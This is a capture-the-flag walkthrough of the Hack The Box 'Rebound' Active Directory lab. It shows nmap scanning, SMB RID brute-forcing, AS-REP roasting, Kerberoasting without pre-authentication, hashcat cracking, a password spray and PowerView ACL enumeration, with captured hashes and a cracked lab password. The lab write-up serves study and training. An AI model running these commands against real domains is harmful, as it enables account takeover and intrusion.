HacktheBox-Rebound

Preface

The other day I saw a streamer covering this box, so I'm taking some time to study it and string together the details of AD domains.

Following the write-up step by step to learn from it.

Information Gathering

Run an nmap scan:

nmap -p- --min-rate 1000 10.10.11.231
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-03 18:59 CST
Nmap scan report for 10.10.11.231
Host is up (0.41s latency).
Not shown: 65509 closed tcp ports (reset)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49671/tcp open unknown
49686/tcp open unknown
49687/tcp open unknown
49688/tcp open unknown
49701/tcp open unknown
49716/tcp open unknown
49737/tcp open unknown
49785/tcp open unknown

Extract the open ports from the output and run a service/script scan against just those ports.

53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49686,49687,49688,49701,49716,49737,49785,
nmap -sSCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49671,49686,49687,49688,49701,49716,49737,49785 10.10.11.231
Nmap scan report for 10.10.11.231
Host is up (0.41s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-03 17:51:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb, DNS:rebound.htb, DNS:rebound
| Not valid before: 2025-03-06T19:51:11
|_Not valid after: 2122-04-08T14:05:49
|_ssl-date: 2025-04-03T17:53:10+00:00; +6h41m03s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb, DNS:rebound.htb, DNS:rebound
| Not valid before: 2025-03-06T19:51:11
|_Not valid after: 2122-04-08T14:05:49
|_ssl-date: 2025-04-03T17:53:10+00:00; +6h41m04s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb, DNS:rebound.htb, DNS:rebound
| Not valid before: 2025-03-06T19:51:11
|_Not valid after: 2122-04-08T14:05:49
|_ssl-date: 2025-04-03T17:53:10+00:00; +6h41m03s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb, DNS:rebound.htb, DNS:rebound
| Not valid before: 2025-03-06T19:51:11
|_Not valid after: 2122-04-08T14:05:49
|_ssl-date: 2025-04-03T17:53:10+00:00; +6h41m04s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49686/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49687/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49701/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49737/tcp open msrpc Microsoft Windows RPC
49785/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h41m03s, deviation: 0s, median: 6h41m03s
| smb2-time:
| date: 2025-04-03T17:53:03
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.06 seconds

Add the host to /etc/hosts, then restart networking with systemctl restart networking.

echo "10.10.11.231 dc01.rebound.htb rebound.htb" | tee -a /etc/hosts
systemctl restart networking

SMB

Anonymous connection:

smbclient -L \\\\10.10.11.231\\

Continuing, we find that the Shared share can be accessed anonymously, but it is empty. We can then use lookupsid.py to enumerate the SIDs of existing users. It does this by looping over relative identifiers (RIDs); each RID is appended to the domain SID to form a full SID.

For domain accounts, the SID of a security principal is created by concatenating the SID of the domain with a relative identifier (RID) for the account.

lookupsid sends its queries over an already established anonymous SMB connection (such as the one used to access the Shared share). Domain SIDs have the form S-1-5-21-..., where the last component is the RID; ordinary user RIDs usually start at 1000, so iterating through RIDs brute-forces the users. lookupsid defaults to a maximum RID of 4000, so the limit needs to be raised to enumerate everything.

lookupsid.py nan@10.10.11.231 10000 -no-pass
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[*] Brute forcing SIDs at 10.10.11.231
[*] StringBinding ncacn_np:10.10.11.231[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
498: rebound\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: rebound\Administrator (SidTypeUser)
501: rebound\Guest (SidTypeUser)
502: rebound\krbtgt (SidTypeUser)
512: rebound\Domain Admins (SidTypeGroup)
513: rebound\Domain Users (SidTypeGroup)
514: rebound\Domain Guests (SidTypeGroup)
515: rebound\Domain Computers (SidTypeGroup)
516: rebound\Domain Controllers (SidTypeGroup)
517: rebound\Cert Publishers (SidTypeAlias)
518: rebound\Schema Admins (SidTypeGroup)
519: rebound\Enterprise Admins (SidTypeGroup)
520: rebound\Group Policy Creator Owners (SidTypeGroup)
521: rebound\Read-only Domain Controllers (SidTypeGroup)
522: rebound\Cloneable Domain Controllers (SidTypeGroup)
525: rebound\Protected Users (SidTypeGroup)
526: rebound\Key Admins (SidTypeGroup)
527: rebound\Enterprise Key Admins (SidTypeGroup)
553: rebound\RAS and IAS Servers (SidTypeAlias)
571: rebound\Allowed RODC Password Replication Group (SidTypeAlias)
572: rebound\Denied RODC Password Replication Group (SidTypeAlias)
1000: rebound\DC01$ (SidTypeUser)
1101: rebound\DnsAdmins (SidTypeAlias)
1102: rebound\DnsUpdateProxy (SidTypeGroup)
1951: rebound\ppaul (SidTypeUser)
2952: rebound\llune (SidTypeUser)
3382: rebound\fflock (SidTypeUser)
5277: rebound\jjones (SidTypeUser)
5569: rebound\mmalone (SidTypeUser)
5680: rebound\nnoon (SidTypeUser)
7681: rebound\ldap_monitor (SidTypeUser)
7682: rebound\oorend (SidTypeUser)
7683: rebound\ServiceMgmt (SidTypeGroup)
7684: rebound\winrm_svc (SidTypeUser)
7685: rebound\batch_runner (SidTypeUser)
7686: rebound\tbrady (SidTypeUser)
7687: rebound\delegator$ (SidTypeUser)

Clean up the data. The write-up does this with a command pipeline; I'm not that skilled, so I just eyeballed it. What we extract are the SidTypeUser entries, which generally represent accounts that can be used.

lookupsid.py nan@10.10.11.231 10000 -no-pass | grep 'SidTypeUser' | sed 's/.*\\\(.*\) (SidTypeUser)/\1/' > usernames.txt
Administrator
Guest
krbtgt
DC01$
ppaul
llune
fflock
jjones
mmalone
nnoon
ldap_monitor
oorend
winrm_svc
batch_runner
tbrady
delegator$
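As an added example (not from the write-up), the Python below parses the lookupsid.py output above into structured entries, pulls out the SidTypeUser names the grep/sed pipeline produces, rebuilds full SIDs from the domain SID plus RID, and reports which accounts a run with lookupsid's default RID ceiling of 4000 would have missed. The sample input is an excerpt of the output shown above.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Sample input: an excerpt of the lookupsid.py output shown above.
LOOKUPSID_OUTPUT = r"""
[*] Brute forcing SIDs at 10.10.11.231
[*] StringBinding ncacn_np:10.10.11.231[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
500: rebound\Administrator (SidTypeUser)
501: rebound\Guest (SidTypeUser)
502: rebound\krbtgt (SidTypeUser)
512: rebound\Domain Admins (SidTypeGroup)
1000: rebound\DC01$ (SidTypeUser)
1101: rebound\DnsAdmins (SidTypeAlias)
1951: rebound\ppaul (SidTypeUser)
5277: rebound\jjones (SidTypeUser)
7683: rebound\ServiceMgmt (SidTypeGroup)
7687: rebound\delegator$ (SidTypeUser)
"""

DEFAULT_MAX_RID = 4000  # lookupsid.py's default ceiling; the write-up raises it to 10000

DOMAIN_SID_RE = re.compile(r"^\[\*\] Domain SID is: (S-1-5-21-\d+-\d+-\d+)$")
# "<rid>: <domain>\<name> (<SidType>)"; the name itself may end in '$' (machine accounts)
ENTRY_RE = re.compile(r"^(\d+): ([^\\]+)\\(.+?) \((SidType\w+)\)$")


@dataclass(frozen=True)
class SidEntry:
    rid: int
    domain: str
    name: str
    sid_type: str


def parse_lookupsid(output: str) -> tuple[str, list[SidEntry]]:
    """Return (domain SID, entries); lines matching neither pattern are ignored."""
    domain_sid = None
    entries: list[SidEntry] = []
    for raw in output.splitlines():
        line = raw.strip()
        m = DOMAIN_SID_RE.match(line)
        if m:
            domain_sid = m.group(1)
            continue
        m = ENTRY_RE.match(line)
        if m:
            entries.append(SidEntry(int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    if domain_sid is None:
        raise ValueError("no 'Domain SID is:' line found in output")
    return domain_sid, entries


def full_sid(domain_sid: str, rid: int) -> str:
    """A principal's SID is the domain SID with the RID appended as the last sub-authority."""
    return f"{domain_sid}-{rid}"


def user_accounts(entries: list[SidEntry]) -> list[str]:
    """Same selection as the grep/sed pipeline: names of SidTypeUser entries, in output order."""
    return [e.name for e in entries if e.sid_type == "SidTypeUser"]


def classify(entry: SidEntry) -> str:
    """RIDs below 1000 are well-known/built-in; names ending in '$' are machine accounts."""
    if entry.rid < 1000:
        return "well-known"
    if entry.name.endswith("$"):
        return "machine"
    return "user" if entry.sid_type == "SidTypeUser" else "group-or-alias"


def beyond_default_limit(entries: list[SidEntry], limit: int = DEFAULT_MAX_RID) -> list[SidEntry]:
    """Entries that a run with the default maximum RID would never have reached."""
    return [e for e in entries if e.rid > limit]


if __name__ == "__main__":
    sid, found = parse_lookupsid(LOOKUPSID_OUTPUT)
    for e in found:
        print(f"{full_sid(sid, e.rid):<55} {classify(e):<14} {e.name}")
    print("missed at default RID limit:", [e.name for e in beyond_default_limit(found)])
```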

Entry Point

Look for users susceptible to AS-REP roasting, i.e. accounts configured not to require Kerberos pre-authentication. Use GetNPUsers.py to check the user list in bulk for the UF_DONT_REQUIRE_PREAUTH flag.

GetNPUsers.py -dc-ip 10.10.11.231 rebound.htb/ -usersfile usernames.txt
$krb5asrep$23$jjones@REBOUND.HTB:0bc201fbc7633d7659a692dbdae5417a$2f61224306482f9b27d7ac0e23e076dee4f2908a54024b6c3c76b561cc6f632ca552fa95855600f435435a0b08f6f8232e2c1107098cbce70d82b4b6b30696458877029be8ff9d684718eff61f45472167592ac5d547cce364b2e6df0a9ef7d6692bd530e11604435d07302ec16ad9b2e5ba27ceb6d30010c8427b78b1b9efd8c846bd22b67cec266bc526210b4a798b53dfe152cec531ad95215de982f345212c4eb902195e774599c56295d7f699bd446e70178b3bc087f366ea0f5e3afc709f4d79440d1d5e7bc8ce5a60d42835e566b70ca939bbb1d2e076d52915f9ca184a0811ffb14f11125213

Crack the hash with hashcat:

hashcat -m 18200 '$krb5asrep$23$jjones@REBOUND.HTB:0bc201fbc7633d7659a692dbdae5417a$2f61224306482f9b27d7ac0e23e076dee4f2908a54024b6c3c76b561cc6f632ca552fa95855600f435435a0b08f6f8232e2c1107098cbce70d82b4b6b30696458877029be8ff9d684718eff61f45472167592ac5d547cce364b2e6df0a9ef7d6692bd530e11604435d07302ec16ad9b2e5ba27ceb6d30010c8427b78b1b9efd8c846bd22b67cec266bc526210b4a798b53dfe152cec531ad95215de982f345212c4eb902195e774599c56295d7f699bd446e70178b3bc087f366ea0f5e3afc709f4d79440d1d5e7bc8ce5a60d42835e566b70ca939bbb1d2e076d52915f9ca184a0811ffb14f11125213' /usr/share/wordlists/rockyou.txt

But it does not seem to crack.

Kerberoasting Without Credentials

However, for Kerberoasting, access to the session key is not required. Only the resulting ST—or more accurately, the encrypted part of the ST, which is not secured with the requesting accounts key—is required. Therefore, if any account is configured to not require pre-authentication, it is possible to Kerberoast without any credentials.

Support for Kerberoasting without pre-authentication and ST request through AS-REQ by ShutdownRepo · Pull Request #1413 · fortra/impacket

Current versions of impacket support the -no-preauth option, which lets us request tickets through jjones in this way.

GetUserSPNs.py -no-preauth jjones -request -usersfile usernames.txt rebound.htb/ -dc-ip 10.10.11.231
Impacket v0.13.0.dev0+20250401.172759.352695f1 - Copyright Fortra, LLC and its affiliated companies

[-] Principal: Administrator - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: Guest - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$krbtgt$REBOUND.HTB$*krbtgt*$eb6327d4e7a899a4c90a7fe9$5ba2eeba25ffb118c6a8ef1351e16adf2a9024690ee10bcc0690c573feb4282076ffe8b6049e3ce8baca1ebd012364e753013674b16186d693d0d888e1ee1d3078b6bf309b08f5ff68c28d7847496876aa0ee847e9c45ab01f8405dd7239ecc36ec5113f7bc22b9f3458ca864310ea787060d5664aa7f228e6c63cbe5059b6030dc942d7ddbd82f460823adb57a5b72e9a4690aebee1ed1821f18f24eb6227e56e11eed6431eed605fa5ed7b8170319f46b40357476456cdd7551245b3bb416af5e9f2ae1a8cd4f14d5a8b3cb4a3769ea897eef0e88b17c0b44d3de16e057a6fcda63aa0a7642578523c448d0d87bcc313d16c71ea8ffd952e6e16ce4c135450c4453b9bf523d1dac0f13a86c452a98a4f145ee6939d9b1da0d11e4eb8116a4403a469a7a8865fd24e03049072a0cb276e591a9c9edbeee818919d56228ef01c4b44b06c8385b56de2ea48d4d8457f9cea5056fe0936e8e354aa7391fbcc45d6dfcc349c354e0a3e6cf8ca79e145066c423d3c4f15fa6981e2edd81ee8ec1eea7bee971f0a607c98f61c6c59df0a3774d2a3502b556008041e6bdae80e6e14f246b1a7b4d10dcf5a8b3c88e77766fc6515afa75bad6b1704f6fdfcddf2f2c6c3c9e430a112347027d0332835c1fb2ee74b64fe8793c71705548a1ec62b4f31b6cc91a1786de64a61416c266e7d520ac04d3bbeb14b14e31f8e584226a1e50a5f5fedc276acde68c6f34c108698c0cd0dd2f93691a4d1d00f1274be471728f9b731acafbb9e583915dbca59fbc33749e3dcbc6c32dcdd058fb72031480f92f0f5fe29f34860a076c0c3f1a76bf8963287bac02e6c79bbf9ae095d621432596784ddd24671c951b7df843d9a453181b2368fe48e93f04bfe88da4ba5b31b5a910a6869891c835df4cd33cc19b87d59d385bfd9feb9a63658eb7e1631448a7c96e5116ad202507198f821409983b15598a6f41b95d86208c72ff9476954140756b8efb8a0558bb6f10069180698005df87b53cec06f77f03e863fb57f7fc978c93838129ba48a9657a5a125287ce3e648e440b7ca9dd3904952ec17d494d1bdf303b99da31e8a2fb28535d9e8320cecf51eaeabe4694e5afdb86868a7d7db6cf091cb27b1fe88527a2788a3cc4e35890808640e0344859e2053f0b2214f600616edfe4028e9681084f639bf9b2e72c5f42143fb4e408f8fbf7f006c43b1da4a89a567cf77e7315803ee456c308b5ecc443956deae5da50896445e6d481ee1f03767b85938c9ab5b65070e6e1507cce38f47d15ab68b2f9883f12d1a50382af5d9cc68297a0f7712549e00a2efd8be91aa3cb422105d829f3b067e1e01cb702d192f548d5409f2be163
220e584bb2ec4fefe233984286082cd18582141ed02533a981d133f4569106cd15d46b94cfbee0d897e5b2699117e897080db77e125f4d2375402db4be637e8532ec0b196a820c3819212
$krb5tgs$18$DC01$$REBOUND.HTB$*DC01$*$7cbd9dd749a5126aee376eb6$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
[-] Principal: ppaul - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: llune - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: fflock - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: jjones - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: mmalone - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: nnoon - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$218629c8ade25b5e45b47d69218b6c7b$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
[-] Principal: oorend - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: winrm_svc - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: batch_runner - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
[-] Principal: tbrady - Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)
$krb5tgs$18$delegator$$REBOUND.HTB$*delegator$*$2322878b42915089e6dd828c$22b3a2c65a9b2ca43bbaab2847a752a50bfb29e172ca7e3cb7b0b6d407e91be63f5bbfed1f96b2b1f0992c09abc57dc43d8086394f628634df5a5a37652c3619b4168605d5b27d19e0f03f0769dcc9240cd2e541f3b9fbcc62fd26a3f5bb001c7c62ad4f7bb85fc9fbcd65c1edf28891fb3a8e5718248cd471498bc2a4fb15d58bee550484afc8a10da6df5a1ae627996442af00ea1d22bed1d83266f224df4e799eadbdca4ba3ac39cfe595de1ab36fd9c24c64624608900a48bf3a0ce4d5ee126ccf628ceba25e8fc46560dc801e3045baf92fdfa2b36f4011293f6e696f43dc53f9111e39b474ec8c7e3dbb0afc712898f8b5746d2cdc3b4724c3c3b0c199e60fad1b2a374036f2b78c97fdfd0dc14b9819667f4fab23c665b609a35340b121067c6059887639ca2bc641ffe845ca2d8804509018a04973c056c67ee70bf9ae5ec4419057f6aec667381206a5a33dc88c9b11eaba181c139190089a8fb00cdaa16b8a2390671f7b9d44b6ce0f79525ec0e852cd7a966e8818b1fb9ab38c005d6aecc81e14be4c66c0a3a93c167a2ad197e02f250d0d515473c85326753fdc3862c80cc9cbf054060ee19f2383fec08d4d0fce914b986962f343f336e390567aadb18077873365053d977eefdcc97ed15bc29ef6ce106bf22687eee2f2d787c72e24a9f7e44b062a4eae3703b696fbc356d56a377f1a674d6e3e482c66dfb61dcf2753267c39d014d6c00205806cfe7292351c7e03248286bfe761bc92806435e79944a6c54cff940232e97dd97ccde89fda516edfcddd47e468b2cad62558901555ea1c25b97a6b7595ed9448747338448626964e9a1e3b1d45536cbe74a22ceb6571a5d5c7f5f935d141d54a2501837d42d370d18396348f444a036077d381a485a63c9ae904aff734dabe19ee763d8f33e2b3bfd39fc4c585315d6857c93a6772566571fde3e9c2e3740c928f831cba0bdc50f9f2ee2025667fb6f0a622556e696167cfe9de69e8873014808d1c4c71fa2576b0ad05dfdce04156a1dbc692e7eec464589a414eeb978a75ff9f5b3e4d0e7878e331e741c8f2130d5adbf20af4e4dc76d6b2960f89c78345f4560a3fb22fc8ad6667848e7531d72a58ad39935bf8730df771c08620d9a1956d933c1e1f662c5f5e050d33809e45c18a42e5dca20b8d4b5bb7154a6eeee53ce03c5b72dfeb98d518dc360c91643abd4b06f439d245cade99f6928733f232b8f32bf5bb3cd1af16577afe4e00dfd3f90da0004cc04b3b707aa6b3e175a8dd7352ed4ac4f86eca17b5cca3efa687181492410b60558cd5117ea42132796a1c769e1c9fb71fdebce6009cd6626c7330738cfd9e03b0f48
d4a75c4bfbc3a

Four tickets were obtained in total: three with etype 18 and one with etype 23. Put them all in a txt file and crack them.

hashcat -m 19700 hash.txt /usr/share/wordlists/rockyou.txt
hashcat -m 13100 '$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$218629c8ade25b5e45b47d69218b6c7b$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' /usr/share/wordlists/rockyou.txt

The etype 23 one cracks: 1GR8t@$$4u. Thinking about it afterwards, we would certainly need LDAP to gather information anyway, so this one should have been prioritised.
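As an added example (not part of the write-up), the Python below parses the impacket hash formats seen above (AS-REP and TGS-REP, etype 17/18/23), handles machine-account names that end in '$' such as DC01$ and delegator$, groups the lines by the hashcat mode that applies (18200, 13100, 19600, 19700), and lists which service accounts still issued RC4 (etype 23) tickets, the ones worth moving to AES-only keys. The hash strings are constructed: the headers mirror the output above, the ticket bytes are dummy filler.

```python
from __future__ import annotations

import re
from collections import defaultdict

# Constructed sample input: headers mirror the GetNPUsers/GetUserSPNs output above,
# the checksum/ticket hex is dummy filler, not real ticket material.
SAMPLE_HASHES = [
    "$krb5asrep$23$jjones@REBOUND.HTB:" + "0b" * 16 + "$" + "2f" * 40,
    "$krb5tgs$18$krbtgt$REBOUND.HTB$*krbtgt*$" + "eb" * 12 + "$" + "5b" * 40,
    "$krb5tgs$18$DC01$$REBOUND.HTB$*DC01$*$" + "7c" * 12 + "$" + "aa" * 40,
    "$krb5tgs$23$*ldap_monitor$REBOUND.HTB$ldap_monitor*$" + "21" * 16 + "$" + "bb" * 40,
    "$krb5tgs$18$delegator$$REBOUND.HTB$*delegator$*$" + "23" * 12 + "$" + "cc" * 40,
]

# hashcat modes for the formats impacket emits (only the ones we are sure of)
HASHCAT_MODES = {("asrep", 23): 18200, ("tgs", 23): 13100, ("tgs", 17): 19600, ("tgs", 18): 19700}

# $krb5asrep$23$<user>@<REALM>:<checksum>$<enc-part>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):(?P<cksum>[0-9a-f]+)\$(?P<data>[0-9a-f]+)$")
# $krb5tgs$23$*<user>$<REALM>$<spn>*$<16-byte checksum>$<enc-part>; user may end in '$'
TGS_RC4_RE = re.compile(
    r"^\$krb5tgs\$23\$\*(?P<user>[^$]+\$?)\$(?P<realm>[^$*]+)\$(?P<spn>[^*]+)\*\$(?P<cksum>[0-9a-f]{32})\$(?P<data>[0-9a-f]+)$")
# $krb5tgs$17|18$<user>$<REALM>$*<spn>*$<12-byte checksum>$<enc-part>
TGS_AES_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>17|18)\$(?P<user>[^$]+\$?)\$(?P<realm>[^$*]+)\$\*(?P<spn>[^*]+)\*\$(?P<cksum>[0-9a-f]{24})\$(?P<data>[0-9a-f]+)$")


def parse_krb_hash(line: str) -> dict | None:
    """Split one impacket hash line into its fields, or return None if it is not one."""
    line = line.strip()
    m = ASREP_RE.match(line)
    if m:
        kind, etype, spn = "asrep", int(m.group("etype")), None
    else:
        m = TGS_RC4_RE.match(line)
        if m:
            kind, etype, spn = "tgs", 23, m.group("spn")
        else:
            m = TGS_AES_RE.match(line)
            if not m:
                return None
            kind, etype, spn = "tgs", int(m.group("etype")), m.group("spn")
    return {"kind": kind, "etype": etype, "user": m.group("user"), "realm": m.group("realm"),
            "spn": spn, "mode": HASHCAT_MODES.get((kind, etype)), "hash": line}


def group_by_mode(lines: list[str]) -> dict[int, list[str]]:
    """Bucket hash lines by hashcat mode, so each bucket can go into its own file
    (the write-up does this split by hand: -m 19700 for the etype 18 file, -m 13100 for the etype 23 one)."""
    groups: dict[int, list[str]] = defaultdict(list)
    for line in lines:
        parsed = parse_krb_hash(line)
        if parsed and parsed["mode"] is not None:
            groups[parsed["mode"]].append(line)
    return dict(groups)


def rc4_service_accounts(lines: list[str]) -> list[str]:
    """Accounts whose service ticket came back RC4-encrypted (etype 23): a wordlist cracks these
    fastest, so they are the ones to move to AES-only keys (msDS-SupportedEncryptionTypes) and
    long random passwords (or a gMSA)."""
    return [p["user"] for p in map(parse_krb_hash, lines) if p and p["kind"] == "tgs" and p["etype"] == 23]


if __name__ == "__main__":
    for mode, hashes in sorted(group_by_mode(SAMPLE_HASHES).items()):
        print(f"hashcat -m {mode}: {len(hashes)} hash(es)")
    print("RC4 service accounts:", rc4_service_accounts(SAMPLE_HASHES))
```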

Judging by its name, ldap_monitor is very likely a service account. Since it was created by another user, password reuse is quite possible, so we do an SMB password spray (add --continue-on-success so that every match is reported):

nxc smb rebound.htb -u usernames.txt -p '1GR8t@$$4u' -d rebound.htb --continue-on-success

Sure enough, one more account works: oorend:1GR8t@$$4u

PowerView Enumeration

This requires installing PowerView.py:

GitHub - aniqfakhrul/powerview.py: Just another Powerview alternative

To avoid problems, sync the clock with ntpdate first, then connect.

powerview rebound.htb/oorend:'1GR8t@$$4u'@10.10.11.231

Note: if the connection fails, you need to synchronise time; the BloodHound section below covers this in detail. (Also, before doing anything involving Kerberos, always sync time first, otherwise you will get warnings.)

Get information on ldap_monitor.

Get-DomainUser -identity ldap_monitor
cn : ldap_monitor
distinguishedName : CN=ldap_monitor,CN=Users,DC=rebound,DC=htb
name : ldap_monitor
objectGUID : {cf7691bd-5b32-407d-9d42-262013f10288}
userAccountControl : NORMAL_ACCOUNT [66048]
DONT_EXPIRE_PASSWORD
badPwdCount : 0
badPasswordTime : 08/04/2023 15:46:25 (1 year, 11 months ago)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 08/04/2023 16:23:35 (1 year, 11 months ago)
pwdLastSet : 08/04/2023 09:07:56 (1 year, 11 months ago)
primaryGroupID : 513
objectSid : S-1-5-21-4078382237-1492182817-2568127209-7681
sAMAccountName : ldap_monitor
sAMAccountType : SAM_USER_OBJECT
servicePrincipalName : ldapmonitor/dc01.rebound.htb
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb


Get-DomainUser -identity oorend
cn : oorend
distinguishedName : CN=oorend,CN=Users,DC=rebound,DC=htb
name : oorend
objectGUID : {edb118e8-3995-45d9-89f1-bf978e4e7fa4}
userAccountControl : NORMAL_ACCOUNT [66048]
DONT_EXPIRE_PASSWORD
badPwdCount : 0
badPasswordTime : 09/04/2023 09:54:33 (1 year, 11 months ago)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 04/04/2025 10:53:25 (today)
pwdLastSet : 08/04/2023 09:07:56 (1 year, 11 months ago)
primaryGroupID : 513
objectSid : S-1-5-21-4078382237-1492182817-2568127209-7682
sAMAccountName : oorend
sAMAccountType : SAM_USER_OBJECT
objectCategory : CN=Person,CN=Schema,CN=Configuration,DC=rebound,DC=htb

Then use the SIDs to look up ACL permissions. (Note that PowerView is case-sensitive; wrong casing can easily give incorrect results.)

PV > Get-DomainObjectAcl -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7681
[2025-04-04 14:10:03] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
PV > Get-DomainObjectAcl -SecurityIdentifier S-1-5-21-4078382237-1492182817-2568127209-7682
[2025-04-04 14:09:41] [Get-DomainObjectAcl] Recursing all domain objects. This might take a while
ObjectDN : CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
ObjectSID : S-1-5-21-4078382237-1492182817-2568127209-7683
ACEType : ACCESS_ALLOWED_ACE
ACEFlags : None
ActiveDirectoryRights : Self
AccessMask : Self
InheritanceType : None
SecurityIdentifier : REBOUND\oorend

ldap_monitor has no ACL entries, while oorend has Self rights over ServiceMgmt. The entry type is ACCESS_ALLOWED_ACE, an access-allowed ACE that explicitly grants a user or group a specific operation on a resource.

For example, it can add itself to the ServiceMgmt group.

Look for more information, such as organizational units (an OU is a container object in Active Directory used to logically group and manage users, computers, Group Policy and other AD objects).

(LDAPS)-[dc01.rebound.htb]-[rebound\oorend]
PV > Get-DomainOU
objectClass : top
organizationalUnit
ou : Service Users
distinguishedName : OU=Service Users,DC=rebound,DC=htb
instanceType : 4
whenCreated : 08/04/2023 09:07:56 (1 year, 11 months ago)
whenChanged : 04/04/2025 12:58:02 (today)
uSNCreated : 69325
uSNChanged : 185281
name : Service Users
objectGUID : {fc826af9-06f9-47e7-866e-4c3c015638b8}
objectCategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=rebound,DC=htb
dSCorePropagationData : 04/04/2025
04/04/2025
04/04/2025
04/04/2025
01/01/1601

objectClass : top
organizationalUnit
ou : Domain Controllers
distinguishedName : OU=Domain Controllers,DC=rebound,DC=htb
instanceType : 4
whenCreated : 07/04/2023 14:01:41 (1 year, 11 months ago)
whenChanged : 07/04/2023 14:01:41 (1 year, 11 months ago)
uSNCreated : 5804
uSNChanged : 5804
name : Domain Controllers
objectGUID : {80923a93-fed7-4fe0-b3c7-980864dc3f78}
objectCategory : CN=Organizational-Unit,CN=Schema,CN=Configuration,DC=rebound,DC=htb
gPLink : [LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=rebound,DC=htb;0]
dSCorePropagationData : 04/08/2023
04/07/2023
01/01/1601

